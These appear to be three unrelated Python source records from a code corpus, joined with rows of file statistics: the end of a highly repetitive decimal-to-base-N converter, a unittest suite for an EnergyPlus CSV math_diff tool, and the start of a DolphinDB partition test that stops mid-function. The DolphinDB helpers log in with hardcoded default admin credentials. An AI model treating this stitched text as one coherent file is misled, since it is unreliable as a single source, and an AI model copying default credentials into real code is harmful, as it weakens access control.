string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
else:
string += str(temp%29)
temp = temp // 29
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 30:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%30
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
else:
string += str(temp%30)
temp = temp // 30
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 31:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%31
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
else:
string += str(temp%31)
temp = temp // 31
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 32:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%32
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
else:
string += str(temp%32)
temp = temp // 32
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 33:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%33
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
else:
string += str(temp%33)
temp = temp // 33
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 34:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%34
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
elif temp2 == 33:
string += "X"
else:
string += str(temp%34)
temp = temp // 34
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 35:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%35
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
elif temp2 == 33:
string += "X"
elif temp2 == 34:
string += "Y"
else:
string += str(temp%35)
temp = temp // 35
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
elif o_base == 36:
number = int(input("Enter the Decimal number: "))
temp = number
string = ""
temp_list = []
while temp > 0:
temp2 = temp%36
if temp2 == 10:
string += "A"
elif temp2 == 11:
string += "B"
elif temp2 == 12:
string += "C"
elif temp2 == 13:
string += "D"
elif temp2 == 14:
string += "E"
elif temp2 == 15:
string += "F"
elif temp2 == 16:
string += "G"
elif temp2 == 17:
string += "H"
elif temp2 == 18:
string += "I"
elif temp2 == 19:
string += "J"
elif temp2 == 20:
string += "K"
elif temp2 == 21:
string += "L"
elif temp2 == 22:
string += "M"
elif temp2 == 23:
string += "N"
elif temp2 == 24:
string += "O"
elif temp2 == 25:
string += "P"
elif temp2 == 26:
string += "Q"
elif temp2 == 27:
string += "R"
elif temp2 == 28:
string += "S"
elif temp2 == 29:
string += "T"
elif temp2 == 30:
string += "U"
elif temp2 == 31:
string += "V"
elif temp2 == 32:
string += "W"
elif temp2 == 33:
string += "X"
elif temp2 == 34:
string += "Y"
elif temp2 == 35:
string += "Z"
else:
string += str(temp%36)
temp = temp // 36
for x in string:
temp_list.append(x)
temp_list.reverse()
result = ""
for y in temp_list:
result += y
print("=============================")
print("Your result is",result)
print("=============================")
else:
break
inp = input("Press Enter to close...")
| 38.141848
| 114
| 0.290496
| 4,927
| 64,803
| 3.758271
| 0.027806
| 0.162823
| 0.060485
| 0.031755
| 0.920343
| 0.915699
| 0.913755
| 0.908408
| 0.904736
| 0.900092
| 0
| 0.057601
| 0.582874
| 64,803
| 1,699
| 115
| 38.141848
| 0.627428
| 0.005293
| 0
| 0.908764
| 0
| 0
| 0.080705
| 0.040241
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.084634
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98cd7cea93240b1af9f1c1e68ba3adc2576339de
| 16,343
|
py
|
Python
|
epregressions/tests/diffs/test_math_diff.py
|
lefticus/EnergyPlusRegressionTool
|
6382334fc350c0dcd0d6d9ccb4fc78f6d622ad1a
|
[
"BSD-3-Clause"
] | 7
|
2019-02-11T19:03:11.000Z
|
2022-01-23T20:03:21.000Z
|
epregressions/tests/diffs/test_math_diff.py
|
lefticus/EnergyPlusRegressionTool
|
6382334fc350c0dcd0d6d9ccb4fc78f6d622ad1a
|
[
"BSD-3-Clause"
] | 69
|
2018-11-12T16:12:35.000Z
|
2021-11-17T17:46:28.000Z
|
epregressions/tests/diffs/test_math_diff.py
|
lefticus/EnergyPlusRegressionTool
|
6382334fc350c0dcd0d6d9ccb4fc78f6d622ad1a
|
[
"BSD-3-Clause"
] | 9
|
2019-01-14T11:09:43.000Z
|
2020-08-03T21:17:24.000Z
|
import os
import tempfile
import unittest
from epregressions.diffs.math_diff import math_diff, DuplicateHeaderException
from epregressions.diffs.thresh_dict import ThreshDict
class TestMathDiff(unittest.TestCase):
def setUp(self):
self.cur_dir_path = os.path.dirname(os.path.realpath(__file__))
self.diff_files_dir = os.path.join(self.cur_dir_path, 'csv_resources')
self.temp_output_dir = tempfile.mkdtemp()
self.thresh_dict = ThreshDict(os.path.join(self.diff_files_dir, 'test_math_diff.config'))
def test_identical_files(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_small_diff_in_watts_files(self):
"""This tests the ability to capture diffs in a regular (not-temperature) variable"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_small_watt_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Small Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(2, response[3]) # small diffs
def test_big_diff_in_watts_files(self):
"""This tests the ability to capture diffs in a regular (not-temperature) variable"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_big_watt_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(2, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_small_diff_in_temp_files(self):
"""This tests the ability to capture diffs in a temperature variable - where relative threshold isn't used"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_small_temp_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Small Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(1, response[3]) # small diffs
def test_big_diff_in_temp_files(self):
"""This tests the ability to capture diffs in a temperature variable - where relative threshold isn't used"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_big_temp_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(1, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_mixed_diffs(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_mixed_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(2, response[2]) # big diffs
self.assertEqual(5, response[3]) # small diffs
def test_changed_column_order_equal(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_change_column_order.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_changed_column_order_diffs(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_change_column_order_diffs.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(2, response[2]) # big diffs
self.assertEqual(1, response[3]) # small diffs
def test_changed_timestamps(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_changed_timestamps.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertEqual('Time series do not match', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_empty_data_file_1(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout_empty_data.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('has no data', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_empty_data_file_2(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_empty_data.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('has no data', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_totally_empty_file_1(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout_totally_empty.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('empty', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_totally_empty_file_2(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_totally_empty.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('empty', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_invalid_file_1(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout_DOESNOTEXIST.csv'),
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('unable to open file', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_invalid_file_2(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_DOESNOTEXIST.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('unable to open file', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_duplicate_header_fails(self):
with self.assertRaises(DuplicateHeaderException):
math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_duplicate_header.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
def test_data_with_holes(self):
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_with_data_holes.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('Big Diffs', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(1, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_data_with_more_data_than_headers(self):
"""I don't know how we could get to this situation, but anyway, this tests to ensure that if a file has
more data columns than header columns, the data after the last header column is ignored. A diff is encountered
in the extra column, but it should be ignored."""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_more_data_than_headers.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_data_with_totally_different_headers(self):
"""Two files that don't have _any_ common headers shouldn't work"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_totally_different_headers.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('No common fields', response[0]) # diff status
self.assertEqual(0, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
def test_data_with_extra_column_in_case_2(self):
"""If file 2 has extra columns, the comparison should still work but extra outputs will be ignored"""
response = math_diff(
self.thresh_dict,
os.path.join(self.diff_files_dir, 'eplusout.csv'),
os.path.join(self.diff_files_dir, 'eplusout_extra_column.csv'),
os.path.join(self.temp_output_dir, 'abs_diff.csv'),
os.path.join(self.temp_output_dir, 'rel_diff.csv'),
os.path.join(self.temp_output_dir, 'math_diff.log'),
os.path.join(self.temp_output_dir, 'summary.csv'),
)
self.assertIn('All Equal', response[0]) # diff status
self.assertEqual(24, response[1]) # num records compared
self.assertEqual(0, response[2]) # big diffs
self.assertEqual(0, response[3]) # small diffs
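    def _run_math_diff_sketch(self, case_file):
        """Hedged refactoring sketch, not part of the original suite: every
        test above passes the same six paths and varies only the second input
        file, so a helper like this could collapse the plumbing."""
        return math_diff(
            self.thresh_dict,
            os.path.join(self.diff_files_dir, 'eplusout.csv'),
            os.path.join(self.diff_files_dir, case_file),
            os.path.join(self.temp_output_dir, 'abs_diff.csv'),
            os.path.join(self.temp_output_dir, 'rel_diff.csv'),
            os.path.join(self.temp_output_dir, 'math_diff.log'),
            os.path.join(self.temp_output_dir, 'summary.csv'),
        )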
| 50.754658
| 119
| 0.635379
| 2,241
| 16,343
| 4.414993
| 0.062918
| 0.075197
| 0.123307
| 0.17263
| 0.899131
| 0.899131
| 0.899131
| 0.895795
| 0.895795
| 0.886295
| 0
| 0.012229
| 0.239491
| 16,343
| 321
| 120
| 50.912773
| 0.783812
| 0.112036
| 0
| 0.753472
| 0
| 0
| 0.138964
| 0.038999
| 0
| 0
| 0
| 0
| 0.267361
| 1
| 0.072917
| false
| 0
| 0.017361
| 0
| 0.09375
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
98d5c62c287764fcc7a17062b4be18ac4519b46c
| 80,130
|
py
|
Python
|
test/test_dropPartition.py
|
dolphindb/api_python3
|
caf1c6a38fe3dc0febf33ca5f299c2cdae0f139d
|
[
"Apache-2.0"
] | 26
|
2020-08-09T06:02:41.000Z
|
2022-03-22T10:21:27.000Z
|
test/test_dropPartition.py
|
dolphindb/api_python3
|
caf1c6a38fe3dc0febf33ca5f299c2cdae0f139d
|
[
"Apache-2.0"
] | 8
|
2020-09-15T03:26:34.000Z
|
2022-03-23T10:44:33.000Z
|
test/test_dropPartition.py
|
dolphindb/api_python3
|
caf1c6a38fe3dc0febf33ca5f299c2cdae0f139d
|
[
"Apache-2.0"
] | 5
|
2020-09-22T16:15:50.000Z
|
2021-07-28T05:48:27.000Z
|
import unittest
import dolphindb as ddb
from pandas.testing import assert_frame_equal
from setup import HOST, PORT
class DBInfo:
dfsDBName = 'dfs://testDropPartition'
table1 = 'tb1'
table2 = 'tb2'
tableRows = 10000
def create_dfs_range_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,RANGE,0..10*(n/10)+1)
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, 1..n as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_hash_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,HASH,[INT,10])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_value_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,VALUE,2010.01.01..2010.01.30)
tdata=table(sort(take(2010.01.01..2010.01.30, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_list_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db=database(dbPath,LIST,[`AMD`QWE`CES,`DOP`ASZ,`FSD`BBVC,`AWQ`DS])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`sym).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`sym).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_range_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',RANGE,1 3 5 7 9 11)
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_hash_db():
s = ddb.session()
s.connect(HOST, PORT, "admin", "123456")
ddb_script = '''
login('admin','123456')
n={tbRows}
dbPath='{db}'
if(existsDatabase(dbPath))
dropDatabase(dbPath)
db1=database('',RANGE,2010.01M+0..12)
db2=database('',HASH,[INT,10])
db=database(dbPath,COMPO,[db1,db2])
tdata=table(sort(take(2010.01.01..2010.12.31, n)) as date, take(1..10,n) as id,take(`AMD`QWE`CES`DOP`ASZ`FSD`BBVC`AWQ`DS, n) as sym,rand(100,n) as val)
db.createPartitionedTable(tdata,`{tb1},`date`id).append!(tdata)
db.createPartitionedTable(tdata,`{tb2},`date`id).append!(tdata)
'''.format(db=DBInfo.dfsDBName, tb1=DBInfo.table1, tb2=DBInfo.table2, tbRows=DBInfo.tableRows)
s.run(ddb_script)
s.close()
def create_dfs_compo_range_value_db():
